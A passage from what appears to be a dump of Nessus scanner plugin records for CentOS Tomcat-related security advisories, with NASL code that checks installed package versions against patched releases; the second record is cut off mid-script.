"2021-01-29T00:00:00", "type": "nessus", "title": "CentOS 8 : pki-deps:10.6 (CESA-2019:1529)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11784", "CVE-2018-8014", "CVE-2018-8034", "CVE-2018-8037"], "modified": "2023-02-08T00:00:00", "cpe": ["cpe:/o:centos:centos:8", "p-cpe:/a:centos:centos:apache-commons-collections", "p-cpe:/a:centos:centos:apache-commons-lang", "p-cpe:/a:centos:centos:bea-stax-api", "p-cpe:/a:centos:centos:glassfish-fastinfoset", "p-cpe:/a:centos:centos:glassfish-jaxb-api", "p-cpe:/a:centos:centos:glassfish-jaxb-core", "p-cpe:/a:centos:centos:glassfish-jaxb-runtime", "p-cpe:/a:centos:centos:glassfish-jaxb-txw2", "p-cpe:/a:centos:centos:xmlstreambuffer", "p-cpe:/a:centos:centos:jackson-annotations", "p-cpe:/a:centos:centos:xsom", "p-cpe:/a:centos:centos:jackson-core", "p-cpe:/a:centos:centos:jackson-databind", "p-cpe:/a:centos:centos:jackson-jaxrs-json-provider", "p-cpe:/a:centos:centos:jackson-jaxrs-providers", "p-cpe:/a:centos:centos:jackson-module-jaxb-annotations", "p-cpe:/a:centos:centos:jakarta-commons-httpclient", "p-cpe:/a:centos:centos:javassist", "p-cpe:/a:centos:centos:javassist-javadoc", "p-cpe:/a:centos:centos:pki-servlet-4.0-api", "p-cpe:/a:centos:centos:pki-servlet-container", "p-cpe:/a:centos:centos:python-nss-doc", "p-cpe:/a:centos:centos:python3-nss", "p-cpe:/a:centos:centos:relaxngdatatype", "p-cpe:/a:centos:centos:resteasy", "p-cpe:/a:centos:centos:slf4j", "p-cpe:/a:centos:centos:slf4j-jdk14", "p-cpe:/a:centos:centos:stax-ex", "p-cpe:/a:centos:centos:velocity", "p-cpe:/a:centos:centos:xalan-j2", "p-cpe:/a:centos:centos:xerces-j2", "p-cpe:/a:centos:centos:xml-commons-apis", "p-cpe:/a:centos:centos:xml-commons-resolver"], "id": "CENTOS8_RHSA-2019-1529.NASL", "href": "https://www.tenable.com/plugins/nessus/145683", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The package checks in this plugin were extracted from\n# Red Hat Security Advisory RHSA-2019:1529. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(145683);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/08\");\n\n script_cve_id(\n \"CVE-2018-8014\",\n \"CVE-2018-8034\",\n \"CVE-2018-8037\",\n \"CVE-2018-11784\"\n );\n script_bugtraq_id(\n 104203,\n 104894,\n 104895,\n 105524\n );\n script_xref(name:\"RHSA\", value:\"2019:1529\");\n\n script_name(english:\"CentOS 8 : pki-deps:10.6 (CESA-2019:1529)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote CentOS host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote CentOS Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the\nCESA-2019:1529 advisory.\n\n - tomcat: Open redirect in default servlet (CVE-2018-11784)\n\n - tomcat: Insecure defaults in CORS filter enable 'supportsCredentials' for all origins (CVE-2018-8014)\n\n - tomcat: Host name verification missing in WebSocket client (CVE-2018-8034)\n\n - tomcat: Due to a mishandling of close in NIO/NIO2 connectors user sessions can get mixed up\n (CVE-2018-8037)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2019:1529\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8014\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/06/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:apache-commons-collections\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:apache-commons-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bea-stax-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glassfish-fastinfoset\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glassfish-jaxb-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glassfish-jaxb-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glassfish-jaxb-runtime\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glassfish-jaxb-txw2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:jackson-annotations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:jackson-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:jackson-databind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:jackson-jaxrs-json-provider\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:jackson-jaxrs-providers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:jackson-module-jaxb-annotations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:jakarta-commons-httpclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:javassist\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:javassist-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:pki-servlet-4.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:pki-servlet-container\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python-nss-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python3-nss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:relaxngDatatype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:resteasy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:slf4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:slf4j-jdk14\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:stax-ex\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:velocity\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:xalan-j2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:xerces-j2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:xml-commons-apis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:xml-commons-resolver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:xmlstreambuffer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:xsom\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CentOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/CentOS/release');\nif (isnull(os_release) || 'CentOS' >!< os_release) audit(AUDIT_OS_NOT, 'CentOS');\nvar os_ver = pregmatch(pattern: \"CentOS(?: Stream)?(?: Linux)? release ([0-9]+)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'CentOS');\nos_ver = os_ver[1];\nif ('CentOS Stream' >< os_release) audit(AUDIT_OS_NOT, 'CentOS 8.x', 'CentOS Stream ' + os_ver);\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '8')) audit(AUDIT_OS_NOT, 'CentOS 8.x', 'CentOS ' + os_ver);\n\nif (!get_kb_item('Host/CentOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'CentOS', cpu);\n\nvar module_ver = get_kb_item('Host/RedHat/appstream/pki-deps');\nif (isnull(module_ver)) audit(AUDIT_PACKAGE_NOT_INSTALLED, 'Module pki-deps:10.6');\nif ('10.6' >!< module_ver) audit(AUDIT_PACKAGE_NOT_AFFECTED, 'Module pki-deps:' + module_ver);\n\nvar appstreams = {\n 'pki-deps:10.6': [\n {'reference':'apache-commons-collections-3.2.2-10.module_el8.0.0+30+832da3a1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'apache-commons-collections-3.2.2-10.module_el8.0.0+30+832da3a1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'apache-commons-lang-2.6-21.module_el8.0.0+42+51564204', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'apache-commons-lang-2.6-21.module_el8.0.0+42+51564204', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'bea-stax-api-1.2.0-16.module_el8.0.0+42+51564204', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'bea-stax-api-1.2.0-16.module_el8.0.0+42+51564204', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'glassfish-fastinfoset-1.2.13-9.module_el8.0.0+42+51564204', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'glassfish-fastinfoset-1.2.13-9.module_el8.0.0+42+51564204', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'glassfish-jaxb-api-2.2.12-8.module_el8.0.0+42+51564204', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'glassfish-jaxb-api-2.2.12-8.module_el8.0.0+42+51564204', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'glassfish-jaxb-core-2.2.11-11.module_el8.0.0+42+51564204', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'glassfish-jaxb-core-2.2.11-11.module_el8.0.0+42+51564204', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'glassfish-jaxb-runtime-2.2.11-11.module_el8.0.0+42+51564204', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'glassfish-jaxb-runtime-2.2.11-11.module_el8.0.0+42+51564204', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'glassfish-jaxb-txw2-2.2.11-11.module_el8.0.0+42+51564204', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'glassfish-jaxb-txw2-2.2.11-11.module_el8.0.0+42+51564204', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'jackson-annotations-2.9.8-1.module_el8.0.0+42+51564204', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'jackson-annotations-2.9.8-1.module_el8.0.0+42+51564204', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'jackson-core-2.9.8-1.module_el8.0.0+42+51564204', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'jackson-core-2.9.8-1.module_el8.0.0+42+51564204', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'jackson-databind-2.9.8-1.module_el8.0.0+42+51564204', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'jackson-databind-2.9.8-1.module_el8.0.0+42+51564204', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'jackson-jaxrs-json-provider-2.9.8-1.module_el8.0.0+42+51564204', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'jackson-jaxrs-json-provider-2.9.8-1.module_el8.0.0+42+51564204', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'jackson-jaxrs-providers-2.9.8-1.module_el8.0.0+42+51564204', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'jackson-jaxrs-providers-2.9.8-1.module_el8.0.0+42+51564204', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'jackson-module-jaxb-annotations-2.7.6-4.module_el8.0.0+42+51564204', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'jackson-module-jaxb-annotations-2.7.6-4.module_el8.0.0+42+51564204', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'jakarta-commons-httpclient-3.1-28.module_el8.0.0+42+51564204', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'},\n {'reference':'jakarta-commons-httpclient-3.1-28.module_el8.0.0+42+51564204', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'},\n {'reference':'javassist-3.18.1-8.module_el8.0.0+30+832da3a1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'javassist-3.18.1-8.module_el8.0.0+30+832da3a1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'javassist-javadoc-3.18.1-8.module_el8.0.0+30+832da3a1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'javassist-javadoc-3.18.1-8.module_el8.0.0+30+832da3a1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'pki-servlet-4.0-api-9.0.7-14.module_el8.0.0+42+51564204', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'},\n {'reference':'pki-servlet-4.0-api-9.0.7-14.module_el8.0.0+42+51564204', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'},\n {'reference':'pki-servlet-container-9.0.7-14.module_el8.0.0+42+51564204', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'},\n {'reference':'pki-servlet-container-9.0.7-14.module_el8.0.0+42+51564204', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1'},\n {'reference':'python-nss-doc-1.0.1-10.module_el8.0.0+42+51564204', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python-nss-doc-1.0.1-10.module_el8.0.0+42+51564204', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-nss-1.0.1-10.module_el8.0.0+42+51564204', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-nss-1.0.1-10.module_el8.0.0+42+51564204', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'relaxngDatatype-2011.1-7.module_el8.0.0+42+51564204', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'relaxngDatatype-2011.1-7.module_el8.0.0+42+51564204', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'resteasy-3.0.26-3.module_el8.0.0+42+51564204', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'resteasy-3.0.26-3.module_el8.0.0+42+51564204', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'slf4j-1.7.25-4.module_el8.0.0+39+6a9b6e22', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'slf4j-1.7.25-4.module_el8.0.0+39+6a9b6e22', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'slf4j-jdk14-1.7.25-4.module_el8.0.0+39+6a9b6e22', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'slf4j-jdk14-1.7.25-4.module_el8.0.0+39+6a9b6e22', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'stax-ex-1.7.7-8.module_el8.0.0+42+51564204', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'stax-ex-1.7.7-8.module_el8.0.0+42+51564204', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'velocity-1.7-24.module_el8.0.0+42+51564204', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'velocity-1.7-24.module_el8.0.0+42+51564204', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'xalan-j2-2.7.1-38.module_el8.0.0+30+832da3a1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'xalan-j2-2.7.1-38.module_el8.0.0+30+832da3a1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'xerces-j2-2.11.0-34.module_el8.0.0+30+832da3a1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'xerces-j2-2.11.0-34.module_el8.0.0+30+832da3a1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'xml-commons-apis-1.4.01-25.module_el8.0.0+30+832da3a1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'xml-commons-apis-1.4.01-25.module_el8.0.0+30+832da3a1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'xml-commons-resolver-1.2-26.module_el8.0.0+30+832da3a1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'xml-commons-resolver-1.2-26.module_el8.0.0+30+832da3a1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'xmlstreambuffer-1.5.4-8.module_el8.0.0+42+51564204', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'xmlstreambuffer-1.5.4-8.module_el8.0.0+42+51564204', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'xsom-0-19.20110809svn.module_el8.0.0+42+51564204', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'xsom-0-19.20110809svn.module_el8.0.0+42+51564204', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n ]\n};\n\nvar flag = 0;\nappstreams_found = 0;\nforeach module (keys(appstreams)) {\n var appstream = NULL;\n var appstream_name = NULL;\n var appstream_version = NULL;\n var appstream_split = split(module, sep:':', keep:FALSE);\n if (!empty_or_null(appstream_split)) {\n appstream_name = appstream_split[0];\n appstream_version = appstream_split[1];\n if (!empty_or_null(appstream_name)) appstream = get_one_kb_item('Host/RedHat/appstream/' + appstream_name);\n }\n if (!empty_or_null(appstream) && appstream_version == appstream || appstream_name == 'all') {\n appstreams_found++;\n foreach package_array ( appstreams[module] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = 'CentOS-' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && _release) {\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n }\n }\n}\n\nif (!appstreams_found) audit(AUDIT_PACKAGE_NOT_INSTALLED, 'Module pki-deps:10.6');\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'apache-commons-collections / apache-commons-lang / bea-stax-api / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:27:49", "description": "An update for tomcat is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nApache Tomcat is a servlet container for the Java Servlet and JavaServer Pages (JSP) technologies.\n\nSecurity Fix(es) :\n\n* tomcat: Incorrect handling of empty string URL in security constraints can lead to unintended exposure of resources (CVE-2018-1304)\n\n* tomcat: Late application of security constraints can lead to resource exposure for unauthorised users (CVE-2018-1305)\n\n* tomcat: Insecure defaults in CORS filter enable 'supportsCredentials' for all origins (CVE-2018-8014)\n\n* tomcat: Host name verification missing in WebSocket client (CVE-2018-8034)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nAdditional Changes :\n\nFor detailed information on changes in this release, see the Red Hat Enterprise Linux 7.7 Release Notes linked from the References section.", "cvss3": {}, "published": "2019-08-30T00:00:00", "type": "nessus", "title": "CentOS 7 : tomcat (CESA-2019:2205)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-1304", "CVE-2018-1305", "CVE-2018-8014", "CVE-2018-8034"], "modified": "2019-12-31T00:00:00", "cpe": ["p-cpe:/a:centos:centos:tomcat", "p-cpe:/a:centos:centos:tomcat-admin-webapps", "p-cpe:/a:centos:centos:tomcat-docs-webapp", "p-cpe:/a:centos:centos:tomcat-el-2.2-api", "p-cpe:/a:centos:centos:tomcat-javadoc", "p-cpe:/a:centos:centos:tomcat-jsp-2.2-api", "p-cpe:/a:centos:centos:tomcat-jsvc", "p-cpe:/a:centos:centos:tomcat-lib", "p-cpe:/a:centos:centos:tomcat-servlet-3.0-api", "p-cpe:/a:centos:centos:tomcat-webapps", "cpe:/o:centos:centos:7"], "id": "CENTOS_RHSA-2019-2205.NASL", "href": "https://www.tenable.com/plugins/nessus/128376", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2019:2205 and \n# CentOS Errata and Security Advisory 2019:2205 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(128376);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/12/31\");\n\n script_cve_id(\"CVE-2018-1304\", \"CVE-2018-1305\", \"CVE-2018-8014\", \"CVE-2018-8034\");\n script_xref(name:\"RHSA\", value:\"2019:2205\");\n\n script_name(english:\"CentOS 7 : tomcat (CESA-2019:2205)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for tomcat is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nApache Tomcat is a servlet container for the Java Servlet and\nJavaServer Pages (JSP) technologies.\n\nSecurity Fix(es) :\n\n* tomcat: Incorrect handling of empty string URL in security\nconstraints can lead to unintended exposure of resources\n(CVE-2018-1304)\n\n* tomcat: Late application of security constraints can lead to\nresource exposure for unauthorised users (CVE-2018-1305)\n\n* tomcat: Insecure defaults in CORS filter enable\n'supportsCredentials' for all origins (CVE-2018-8014)\n\n* tomcat: Host name verification missing in WebSocket client\n(CVE-2018-8034)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\n\nAdditional Changes :\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 7.7 Release Notes linked from the References section.\"\n );\n # https://lists.centos.org/pipermail/centos-cr-announce/2019-August/006157.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?aa51c586\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tomcat packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8014\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:tomcat-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:tomcat-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:tomcat-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:tomcat-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:tomcat-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:tomcat-jsvc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:tomcat-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:tomcat-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:tomcat-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/02/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/08/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, 